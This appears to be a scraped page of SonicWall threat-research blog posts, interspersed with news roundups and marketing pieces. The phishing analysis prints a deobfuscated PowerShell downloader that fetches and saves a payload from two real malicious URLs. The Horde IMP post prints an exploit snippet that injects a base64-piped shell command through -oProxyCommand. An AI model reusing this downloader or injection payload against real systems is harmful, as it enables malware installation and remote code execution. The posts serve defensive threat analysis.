New Phishing campaign targets Bank of America Merrill Lynch customers

/in /by

SonicWall has recently spotted a new Bank of America phishing campaign. The scam email claims to come from Bank of America Merrill Lynch, however the email includes a malicious Excel attachment. The Excel document has VBA macros, which when enabled, downloads and runs a malicious payload Win32.Trojan.

Infection Cycle:

Phishing email is the most effective attack vector, as exploit kits are no longer the preferred attack mode for hackers. In this phishing campaign, Bank of America Merrill Lynch customers are being targeted with a custom attack. All these fake emails come from the domain ‘bofamail.com’ not the real ‘bankofamerica.com’. The sender in these emails pretends to be a real employee from Bank of America as we see an online profile in the same name working in the southern California branch. However the Newport branch address and phone number doesn’t match.

Upon launching the excel attachment, a prompt appears with the message –  “If you have problems viewing/loading document content please select “Enable Editing” and then “Enable Content” button”. Once enabled, the macro downloads a malicious payload and the payload gets into action immediately.

The VBA code is locked by password.

After unlocking the VBA project by tweaking the binary, we see the form (shown below) with encoded value in its fields.

VBA code:

VBA code is highly obfuscated to avoid static detection through signatures. It has the logic to retrieve the shell code from the above form.


Shell Code:

The shell code that’s retrieved is pasted below. It has gzip compressed and base64 encoded string.

PowerShell:

After applying decompression and base64 decoding on the above shell code, we get the below function that downloads the malicious payload either from hxxp://gba-llp.ca/za.liva or ‘hxxp://jamaicabeachpolice.com/za.liva’

function <#release#> tisel([string] $stri1)
{
 $tos1=1;
 try{
  (new-object system.net.webclient <#exim#> ).downloadfile($stri1,$env:temp+'\tmp0281.exe');
 }
 catch{
  $tos1=0;
 }
return $tos1;
}

$men1=@('gba-llp.ca/za.liva','jamaicabeachpolice.com/za.liva');
foreach ($rix in $men1)
{
if(tisel('http://'+$rix) -eq 1){
break;
}
};

Hence upon enabling VB macro in the Excel document, shell command gets executed which then invokes Fileless PowerShell script to download and execute the malicious file.

The payload exhibits the following behaviors

  • Stops and deletes the Windows Defender service
  • Sets up Task Scheduler to run for every 10 minutes
  • Injects itself into the whitelisted process ‘svchost.exe’
  • Communicates with the C&C server periodically

Threat Graph:

Sonicwall Capture Labs Threat Research team provides protection against this with the following signatures:

  • GAV: Downloader.HWB (Trojan)
  • GAV: MalAgent.H_13330 (Trojan)

Hashes:

Email:
fed01a32dab1e3ab1eba4b2bfa542219a63b0777608717ad0ba5c5e0c66ec928
336cc2145bc27105906023089264593dcf9ddc99bb4a61af6760920efa97a6f4
f5e923ee210a88c6f02eac9c66ec116e49c964b6e6402124ed02462c69f46e0f
d0582f03ea259bc4d33aa77942b7a4d4ce8163e022ede4dcea9c81d802910321

Excel:
f22c2f747d77d57c14f6e81433691bd1b79f0fde1e111b4c4a90aac278b23654

Payload:
32c58040d3d6ec5305a1a0ebb48ba05aebe3ac2f905a7f152f32fc9170e16711

Payload Url:
http://gba-llp.ca/za.liva
http://jamaicabeachpolice.com/za.liva

Bill Conner: How the UK Is Taking Malware Seriously

/1 Comment/in /by

Bill Conner sat down with Information Age editor Nick Ismail to discuss global malware attack statistics, cross-border cybersecurity collaboration, the increasing need to inspect PDFs and Microsoft Office documents, and how all impact the dynamic U.K. political landscape.

Though malware attack data shows an increase in global attacks, the U.K. has experienced a decrease in these attacks following the WannaCry ransomware strain in previous years.

Conner sees this as a positive change for the U.K. and stated via Information Age, “you guys were all over it” following the WannaCry attack and “most of the vendors in the U.K. and their customers put solutions in place to protect against multiple family variants of ransomware.”

While this is a positive change for the U.K., there is still work to be done globally and Conner says regardless of the often divided political climate, “there’s a good foundation for cyber collaboration across borders.”

“Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day, because they can be exploited for IP and monetary gain. And you can’t even see it.”

Bill Conner
SonicWall President & CEO

In addition to urging governments to look toward political collaboration to tighten cybersecurity globally, Conner explained the majority of this change will come through the dedication of law enforcement.

“Law enforcement sharing is better than political sharing at the moment,” Conner told Information Age. “Public institutions, private organizations and different governments have got to collaborate. But, above all, we’ve got to have dedicated cyber law enforcement.”

While a global cybersecurity strategy may be down the road, Conner says there are places to focus on now to best secure governments, enterprises and SMBs.

What does Conner recommend an organization focus their cybersecurity strategy on?

“What I’m telling governments and enterprises is to forget side-channel exploits for the moment,” he said. “Right now, we need to focus on those PDFs and Office (files), the things you run in your business every day.”

One of the ways to mitigate these specific malware threats requires advanced technology, like SonicWall Capture Advanced Threat Protection (ATP) with SonicWall Real-Time Deep Memory Inspection (RTDMI™), to inspect and mitigate attacks in memory.

Read the rest of Conner’s recommendations and predictions in his interview with Information Age.

Network Security for K-12 School District Simplified with Powerful Firewall, Failover Capabilities

/1 Comment/in /by

The Goffstown School District in New Hampshire supports nearly 4,000 students and staff. And one person oversees it all.

Running the IT department for an entire K-12 school district sounds like a challenge that few would take, but Goffstown School District IT director Gary Girolimon makes it look easy. Clearly, this is the result of years of experience and having sound networking tools available.

If the number of users doesn’t bother you, consider that all seven Goffstown School District buildings are part of a high-speed 10 Gbs dark fiber wide-area network (WAN). At any given part of the day, students can be downloading massive amounts of dangerous files, or stumbling upon harmful content that violates compliance regulations.

So, how do they handle that level of network complexity?

Girolimon, pictured, deployed a SonicWall SuperMassive 9200 high-end firewall at the perimeter of his network. On it, he runs the SonicWall Comprehensive Gateway Security Suite, including content filtering to support CIPA compliance, which helps him manage the bandwidth to demanding applications and block harmful sites. The district also uses SonicWall Analyzer for real-time web traffic reporting.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs,” said Girolimon. “It’s easy to administer, with a flexible UI, and the solution is super reliable. We have had no downtime attributable to our SonicWall firewall.”

Prior to deploying the SuperMassive at the edge, Girolimon deployed smaller SonicWall firewalls, ranging from NSA 2400s to 3600s, at each distributed building location. Those firewalls now provide failover service in case a dark fiber link to the network hub goes down, thereby extending their life and usefulness.

“SonicWall gives us an integrated, cost-effective solution for our organization’s security needs. It’s easy to administer, with a flexible UI, and the solution is super reliable.”

Gary Girolimon
IT Director
Goffstown School District

This flexibility and performance have allowed Girolimon to create a DMZ and bring servers in-house for better local access and to provide specific employees remote access to network assets — all with the confidence they are secure and protected.

By maintaining a single, primary firewall appliance with a failover firewall available as needed, Girolimon greatly simplified administration of firewall rules, app policies and VPN permissions. Integrated content filtering and VPN has simplified CIPA compliance.

Cost-Effective Network Security for K-12 School Districts

Today, more than 3,000 districts and schools rely on SonicWall to deliver secure remote and network access with school firewalls that enable educational institutions to realize the promise of technologically-savvy learning environments, in the classroom or while students are mobile.

LEARN MORE

Build of open source AresCrypt ransomware on github seen in the wild

/in /by

The SonicWall Capture Labs Threat Research Team have recently discovered a build of an open source ransomware known as Arescrypt in the wild.  The source code is hosted on github and is promised to be feature packed.  In the authors own words:  “Well, Arescrypt is one of my first large-scale ransomware malware’s I’ve ever hand-crafted. So, I tried going all out for it, in hopes that it may be developed better in time.”

The author lists the following features for the malware:

  • All-in-one (encryption, verification, and decryption) of files.
  • Unique API calls to configurable server (standalone PHP script included)
  • Information stored in DAT (configuration) file – obfuscated too 😉
  • Extensive configuration file
  • Sandboxing capabilities

Infection Cycle:

The Trojan uses the following icon:

 

The file contains the following metadata:

 

Upon infection, the Trojan shows the following messagebox in order to ease suspicion:

 

The following audio message is played in the background:

 

The Trojan adds the following files to the filesystem:

  • C:\Users\<user>\files.txt
  • <run location>.arescrypt.dat (hidden file)

files.txt contains a list of files that were encrypted.

.arescrypt.dat contains the following data:

{"uniqueKey":"62vq6T5Y27aO","encKey":null,"encIV":null}

 

During the infection cycle, files are encrypted and are given a .OOFNIK extension.  The author may have chosen this extension based on the fictional character Moishe Oofnik from Rechov SumSum, an Israeli version of the popular childrens television series Sesame Street.

 

The Trojan obtains the vicims public IP address by querying ipinfo.io

 

The Trojan reports the infection to a remote server:

 

After the audio message is played, the screen is locked with the following image:

The Trojan demands $40 in bitcoin for file recovery.

 

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: AresCrypt.RSM (Trojan)
  • GAV: AresCrypt.RSM_2 (Trojan)

 

Cyber Security News & Trends – 02-01-19

/0 Comments/in /by

This week, Collections #2-5 drop over 2 billion stolen logins, Bangladesh is suing a Philippines bank over cybertheft and SonicWall CEO Bill Conner discusses keeping up with the cybersecurity market.

SonicWall Spotlight

Could Cash-Rich Facebook Be Considering Acquisition Targets? – Real Money

  • SonicWall CEO Bill Conner is quoted by Real Money talking about Facebook’s need for cybersecurity acquisitions in a piece that speculates where the company might go next.

Are We Really Aware of What Mobile Malware Is? – VarIndia

  • SonicWall’s Debasish Mukherjee is interviewed as part of a panel discussing the mobile malware. He talks about the data SonicWall Capture Labs found on the Android platform throughout 2018.

SonicWall Aims to Build Brand in Critical Two Years – IT Europa

  • Bill Conner, CEO of SonicWall, lends his thoughts to IT Europa talking about the future of the fast-moving cybersecurity market and why not every security company is able to keep up.

Cyber Security News

Hackers are Passing Around a Megaleak of 2.2 Billion Records – Wired

  • After the leak of Collection # 1 earlier in the year Collections #2-5 continue the data dump of hacked records, largely information that has been leaked previously.

Airbus Reports Breach Into Its Systems After Cyber Attack – Reuters

  • Airbus detected a cyberattack which resulted in a data breach of mostly employee data. It says the incident did not affect commercial operations.

What Was the Cybersecurity Impact of the Shutdown? – FCW

  • With the Government shutdown over, the cybersecurity impact is still being worked out. FCW discuss the possible knock-on effects and how long they might last.

IT Spending Expected to Rise in 2019 Amid Shift to Cloud Services – Wall Street Journal

  • Forecasts for IT enterprise spending say there will be an 8.5% growth this year, and overall IT spending is expected to rise 3.2%.

Too Few Cybersecurity Professionals Is a Gigantic Problem for 2019

  • There is a global gap of nearly 3 million cybersecurity positions. In the USA alone 314,000 jobs were posted in a one-year period between 2017 and 2018. Cybersecurity training itself is a new area and almost no cybersecurity professional over 30 today has a formal cybersecurity degree.

Bangladesh to Sue Philippine Bank Over $81M Cyber Heist – Security Week

  • A digital heist in 2016 led to the successful theft of $81 million from the Bangladesh central bank’s account with the US Federal Reserve. Bangladesh is now attempting to retrieve the funds by suing the Philippines bank that facilitated the transfer. The Federal Reserve denies that it was hacked.

Massive DDoS Attack Generates 500 Million Packets per Second – Dark Reading

  • A DDos attack on Github in 2018 made headlines as the biggest ever DDos attack, but it was only a quarter of the size of the attack stopped earlier this month.

Cryptocurrency Thefts, Scams Hit $1.7 Billion in 2018: Report – Reuters

  • Cryptocurrency theft rose 400 percent in 2018, with up to $1.7 billion stolen by the end of the year. $950 million of this was theft from cryptocurrency exchanges and digital wallets.

In Case You Missed It

In the Field: Real-World Success with SonicWall Overdrive 2.0

/1 Comment/in /by

Effectively marketing and selling managed service provider (MSP) services can be a real uphill battle for many organizations. The competition is fierce and positioning your organization’s services or competitive advantages isn’t easy.

For many MSPs and MSSPs, the responsibility of envisioning, designing, developing and maintaining effective marketing materials falls on the shoulders of the sales team or the senior leadership team. But they don’t always have the time or skill to execute what’s needed to cut through the cacophony of marketing noise.

Fortunately, SonicWall has alleviated much of this burden.

SonicWall Overdrive 2.0 is a remarkable resource stocked with modern, appealing and relevant content to help MSPs and MSSPs generate demand and close more business.

If you haven’t spent time in Overdrive 2.0, you’re missing out; there is an incredibly diverse set of resources to assist and even automate things like email blasts, social media, thought-leadership content and promotional material.

In my experience, there are three foundational best practices you should implement as an MSP or MSSP, especially when you’re scratching and clawing for sales in the competitive cybersecurity landscape.

Set Your Goals

Let me take you back a few years. As SonicWall’s FY2016 drew to a close, ProviNET scheduled a meeting with our SonicWall territory account manager (TAM). He really challenged us to set a goal for FY2017 to move up a level in our SonicWall SecureFirst partnership.

He was right. We had been a SonicWall ‘Silver’ partner for several years and with our FY2016 sales, we weren’t too far away from being eligible for ‘gold’ if we also achieved some additional sales and technical certifications. But we weren’t quite sure how to push ourselves across that next threshold.

Our TAM had the answer. He turned us on to SonicWall Overdrive 2.0, the company’s fully automated partner marketing engine designed specifically around key go-to-market themes, campaigns and resources. He assured us that if we invested a little bit of time into marketing, we’d be able to elevate our partnership. With that, our goal was set: we were going to become a SonicWall gold partner in 2017.

SonicWall Overdrive offers turnkey campaigns SecureFirst partners can launch to build awareness, create pipeline and close deals.

Develop Your Strategy

Without a strategy, marketing is a lot like throwing bubble gum at the wall and seeing if it sticks. Spend some time intentionally thinking through four things:

  • Who your organization will target
  • What methods it will use to target
  • How often you will target potential buyers
  • How you will track and measure your efforts

If you have a dedicated marketing person, consider developing a multi-faceted campaign that the marketing team can execute. The campaign should include multiple touchpoints across a variety of channels. Overdrive is an easy-to-use tool, regardless of your resources, to reach your customers and prospects.

At a basic level, consider sending an email blast, posting on social media, sending a postcard, publishing whitepapers or case studies on the website, and using the Overdrive 2.0 content to educate customers and prospects.

SonicWall Overdrive 2.0 packages content and resources partners can leverage as part of one-off marketing efforts or fully integrated campaigns.

We had success using much of the Overdrive 2.0 content to point people to a dedicated SonicWall landing page within our own website where prospects could fill out a form and be contacted to learn more. And because these campaigns were launched by us, they were contacting us for more information (i.e., we received the lead and the opportunity to either nurture the prospect or close the deal).

Even sophisticated customers will not always be able to grasp the full advantages and capabilities of the Capture Cloud platform after just one touchpoint. It will be important to educate them on the advantages that the orchestration of these security products and services can provide to them.

But don’t forget about existing customers here, too. For us, the Overdrive 2.0 marketing content was a motivator to look across our existing SonicWall customer install base and look for opportunity to add additional services like the SonicWall Capture Advanced Threat Protection (ATP) sandbox service or secure email solutions.

Analyze Your Results

There is remarkably valuable information in marketing analytics reports. Whether you use a marketing automation tool, a website analytics engine or even just campaign reporting from Overdrive, it can help your sales staff be more efficient and effective in their sales efforts.

Our team uses a combination of HubSpot, Google Analytics, and the email reports from Overdrive 2.0 to glean insights into customers and prospects who may or may not have an interest in particular marketing campaigns.

We can track if an individual opened an email four times, clicked the link to our site, or engaged with us on social media on several occasions to gauge if there is a genuine interest. Our sales team then makes those prospects and customers the focus of contact for more direct conversations — and that often leads to close deals.

Bear in mind, the goal of marketing is not to sell. These are two very different activities. For ProviNET, we define marketing as a process where we:

Our sales team has a very different, yet complementary, function:

SonicWall Overdrive 2.0 has been an invaluable resource for our team to really accomplish all four of our marketing objectives. By using the assets available in Overdrive 2.0, we’re providing meaningful education about the necessity and value of security products and services. We can position those assets in a compelling and efficient manner to provide the most value to our prospects and customers.

Even better? All registered SonicWall SecureFirst Silver, Gold and Platinum partners in good standing are eligible to use the SonicWall Overdrive 2.0 platform, at no cost, through the SonicWall SecureFirst Partner Portal.

About ProviNET

ProviNET is a SonicWall SecureFirst Gold Partner. For nearly three decades, ProviNET has delivered trusted technology solutions for senior living and post-acute healthcare organizations. Whether it’s a single project or full-time onsite work, ProviNET designs and implements customized solutions so healthcare organizations can focus on core services.

ProviNET’s tight-knit group of experienced, industry-certified personnel are focused on customer satisfaction. They are a reputable organization, fulfilling immediate IT needs and helping plan for tomorrow. They are ready to put their extensive knowledge to work for healthcare, developing strategies and solving challenges with the latest technology.

To learn more about ProviNET, please visit www.provinet.com.

EdgeScheduler: A VBScript Bot in action

/in /by

In the race of complex malware, a simple malware can also be very destructive. A VBScript malware has been spotted by SonicWall which looks very simple but its capabilities are no lesser than any other predominant malware bots.

A VBScript malware with genuine looking file name is being distributed inside an archive file.


Figure 1

Decryption Mechanism

This VBScript malware works as a loader for the actual VBScript Bot which is decrypted in the memory and then executed as shown below:


Figure 2

The decryption logic being used in this particular malware is explained below:


Figure 3

File Level Activity

The VBScript Bot contains base64 encoded PowerShell script which is dropped into the %TEMP% directory after decoding. The PowerShell script has code to fetch user’s credentials from the “Credential Locker” using the PasswordVault class which is available in the Windows 8 and above versions. The stolen data is then sent to the CNC server.


Figure 4

The Bot then generates a random id which is 25 characters long. The random id is first saved into the registry as shown below:


Figure 5

Later, the random id is sent to the CNC server along with the other stolen data.

The Bot creates a sub-directory named “Edge” in the %APPDATA% directory where it copies wscript executable from system directory as “amsi.dll”. It also drops its copy in the same directory using the random id as the filename.


Figure 6

The Bot is now executed from the “Edge” directory using amsi.dll with two parameters as shown below:


Figure 7

The Bot verifies if it is being executed from the “Edge” directory with 2 arguments, then it enumerates processes to check if “amsi.dll” is already running as shown below:


Figure 8

If “amsi.dll” is not found, it adds a run entry into the registry for persistence as shown below:


Figure 9

Command & Control (C&C) Server connections

The Bot establishes connection with the C&C server and sends below mentioned data from the victim’s machine:

  • Operating system information.
  • Username and computer name.
  • Anti-Virus product information.
  • RAM, CPU and Virtual Machine Information.
  • Randomly generated id.
  • Processor architecture.



Figure 10

Code snippet which sends above information from victim’s machine to the C&C server is shown below:

Figure 11

If the length of the response data is more than 4 Bytes, the Bot assumes, the C&C server is running. Otherwise, it tries to establish communication with another server. If the C&C server is running, the Bot parses the response data to retrieve the command and its arguments which are separated by “!”. At the time of analysis, the C&C server sent the “nope” command which means “No Operation”.

The Bot is capable of performing the following actions based on the commands received from the C&C server:


The Bot also contains code to upload file from victim’s machine to the C&C server but that code has not been used this time. This gives us the impression that the Bot is still in development phase and can add more capabilities in future.

This threat was proactively detected by Capture ATP w/RTDMI engine.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: EdgeScheduler.DEC (Trojan)

Hackers actively scanning for Horde IMP Vulnerability

/in /by

SonicWall Capture Labs Threat Research team has recently observed that attackers are actively exploiting Horde IMP vulnerability. Over 3,000 firewalls have been hit with 20,000+ requests in the last two days. Successful exploit could allow the attacker to execute arbitrary shell commands on the vulnerable systems.

Horde IMP:

Horde Groupware Webmail Edition is a free, enterprise ready, browser-based communication suite. It offers applications such as the Horde IMP email client, a groupware package (calendar, notes, tasks, file manager), a wiki and a time and task tracking software. It is written in PHP and provides all the elements required for rapid web application development.

Horde IMP (Internet Messaging Program), an application that comes with the Horde GroupWare is one of the popular and widely deployed open source webmail applications. It allows universal, web-based access to IMAP and POP3 mail servers in all possible browsers (desktop vs. mobile vs. tablet vs. text only).

Vulnerability:

Horde IMP exposes an unauthenticated debug page with a form that permits IMAP requests to arbitrary hosts. The debug page is at “http://horde_path/imp/test.php”. By leveraging the vulnerability (CVE 2018-19518) in imap_open function of PHP, unauthenticated remote attacker can execute arbitrary shell commands on a targeted system.


Fig 1: Snapshot from an active webmail that exposes the debug page

CVE 2018-19518:

Internet Message Access Protocol (IMAP) is an Internet standard protocol used by email clients to retrieve email messages from a mail server over a TCP/IP connection. PHP has bunch of functions to support IMAP out-of-box. This vulnerability exists in the ‘imap_open’ function, that is being used for opening an IMAP stream to a mailbox. It is due to the imap_open function improperly filters mailbox names before passing them to the rsh or ssh commands. If the rsh and ssh functionalities are enabled and the rsh command is a symbolic link to the ssh command, an attacker could exploit this vulnerability by sending a malicious IMAP server name containing a -oProxyCommand argument to the targeted system. A successful exploit could allow the attacker to bypass other disabled exec functions in the affected software, which the attacker could leverage to execute arbitrary shell commands on the targeted system.

Exploit:

In this exploit request, malicious IMAP server name containing a -oProxyCommand is sent to the targeted system.

res = requests.post(target,headers=new_headers,data=[(‘server’, anyname + ‘ -oProxyCommand=echo$IFS$()’ + cmd + ‘|base64$IFS$()-d|sh}’),
(‘port’,’143′),
(‘user’,’a’),
(‘passwd’,’a’),
(‘server_type’,’imap’),
(‘f_submit’,’Submit’)
])

Server name anyname + ‘ -oProxyCommand=echo$IFS$()’ + cmd + ‘|base64$IFS$()-d|sh gets passed to the ssh command without proper input validation. With the help of ProxyCommand, any command can be executed in the context of the user.

Trend Chart:

Find below the attempts made in the last 48 hours. 

Attacker IP’s:

Given below are some of the source IP’s from which the exploit requests have been sent

109.237.27.71
98.6.233.234
173.8.113.97
34.195.252.116
85.25.198.121
103.233.146.6
98.188.240.147
162.158.63.144
203.180.245.92
173.237.133.206
23.210.6.109
45.33.62.197
85.25.100.197
162.243.224.192
212.48.68.180
200.160.158.244
149.126.78.3
162.158.154.95
81.169.158.6
23.35.150.55
51.254.28.132
150.95.169.224
162.158.77.240
139.99.5.223
185.18.197.75
162.158.90.10

Fix:

Upgrade to the latest PHP version  to resolve the issue.
Check for vulnerable PHP versions here: https://www.securityfocus.com/bid/106018
Delete the debug page test.php ‘http://horde_path/imp/test.php’ after installation

Sonicwall Threat Research Lab provides protection against this exploit with the following signatures:

  • IPS: 13996 Horde Imp Remote Code Execution 1
  • IPS: 13997  Horde Imp Remote Code Execution 2
  • IPS: 13998 Horde Imp Remote Code Execution 3
  • WAF: 1690 Horde Imp Remote Code Execution

Cyber Security News & Trends – 01-25-19

/0 Comments/in /by

This week, fears are growing that new 5G industrial robots are vulnerable to cyberattack, the numbers affected by a breach jump from 500 to over 500,000 and the government shutdown continues to worry cybersecurity experts.

SonicWall Spotlight

SonicWall on Winning the Cyber Arms Race on Winning the Cyber Arms Race – Tahawul Tech

  • SonicWall’s Michael Berg is interviewed talking SonicWall’s expansion in Dubai, the cyber arms race and where SonicWall is going in 2019.

Cyber Security News

Why Cybersecurity Must Be a Top Priority for Small & Midsize Businesses – Dark Reading

  • Big corporations seize the cyberattack headlines, but Dark Reading argues that cybersecurity must be a top priority for small and medium businesses, outlining the major security risks and methods of protection.

For Industrial Robots, Hacking Risks Are on the Rise  – Wall Street Journal

  • 5G and the Internet of Things promise to make factories a lot smarter, but also a lot more vulnerable to cyberattacks.

New Ransomware Poses as Games and Software to Trick You Into Downloading It – ZDNet

  • A Dangerous new ransomware dubbed Anatova that was found at the start of the new year is being watched closely by researchers. Its modular architecture makes it easily adaptable and potentially very dangerous in the hands of a skilled cybercriminal.

The Shutdown Is Exposing Our Economy to Crippling Cybersecurity Breaches – Salon

  • Salon details the infrastructural cybersecurity problems, many previously outlined by SonicWall, that have been growing with the ongoing government shutdown.

Proposed Law Classifies Ransomware Infection as a Data Breach – SecurityWeek

  • The Act to Strengthen Identity Theft Protections in North Carolina proposes widening the definition of a breach to include ransomware and even unauthorized access. The legislation requires tightened data protection and a quicker notifications period when there is a breach.

Online Casino Group Leaks Information on 108 Million Bets, Including User Details – ZDNet

  • The server details of an online casino were left exposed online, leaking information on 108 million bets, including complete customer data like real names and addresses, phone numbers, email addresses, birth dates, and more.

Victim Count in Alaska Health Department Breach Soars – BankInfoSecurity

  • It was originally thought to only affect 501 people but the numbers in the Alaska Health Department breach of June 2018 have soared to up to 700,000. The number has soared after months of analysis and confirmation, the DHSS says they always knew the number would rise dramatically after analysis.

Recession Is the Number One Fear for CEOs in 2019, Survey Says – CNBC

  • While recession is the number one fear worldwide, a survey of over 800 CEO’s found that cybersecurity was the number one fear for CEO’s in the U.S.

Cybercriminals Home in on Ultra-High Net Worth Individuals – Dark Reading

  • With a growing cybersecurity awareness in businesses new research is suggesting that some hackers are shifting their sights to the estates and businesses of wealthy families with personalized cyberattacks.

In Case You Missed It

CrypRAT Infostealer actively spreading in the wild.

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of CrypRAT Infostealer  [CrypRAT.A] actively spreading in the wild.

 

Memory Snapshot of the CrypRAT Infostealer ( Raw and Encrypted Data )

Infection Cycle:

The Malware adds the following file to the system:

  • Malware.exe
    • %APPDATA%\roaming\system.exe

The Malware adds the following keys to the Windows registry:

  • HKEY_CURRENT_USER\Environment\SEE_MASK_NOZONECHECKS
    • 1
  • [HKEY_CURRENT_USER\Software\061c2e9167603fb87dafebfaad0bb29a]
    • Keylogger data

Once the computer is compromised, the Malware installs following components to record the activity of the user via key logging and clipboard:

 

The Malware terminates the Self-Extractor process and installs the System.exe [Key logger module] on the target system.

 

The Malware saves raw data in the following registry:

The Malware checks if data is available for transfer to the command and control (C&C) server every 10 seconds.

The Malware uses base64 to encrypt its strings as well as its network communication, here an example:

 

Command and Control (C&C) Traffic

CrypRAT.A performs C&C communication over port 1177. The Malware transfers stolen data in Base64 format, here are some examples:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: CrypRAT.A (Trojan)